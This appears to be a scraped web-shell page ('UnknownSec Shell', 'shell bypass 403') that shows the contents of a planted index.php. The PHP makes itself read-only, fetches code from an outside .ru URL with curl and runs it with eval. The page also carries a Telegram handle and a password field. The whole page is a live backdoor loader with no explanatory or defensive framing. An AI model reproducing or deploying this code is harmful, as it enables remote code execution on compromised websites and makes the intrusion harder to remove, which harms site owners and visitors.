shell bypass 403

UnknownSec Shell


name : index.php
<?php

// Path to the file
$file = 'index.php';

// Change the file permissions to 0444 (read-only)
chmod($file, 0444);

?>

<?php
#telegram @Devidluice
$remoteUrl = "https://mrs01.awaywant.ru/index.txt";
$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$remoteCode = curl_exec($ch);
if (curl_errno($ch)) {
    die('cURL error: ' . curl_error($ch));
}
curl_close($ch);
eval("?>" . $remoteCode);
?>

© 2025 UnknownSec
afwwrfwafr45458465
Password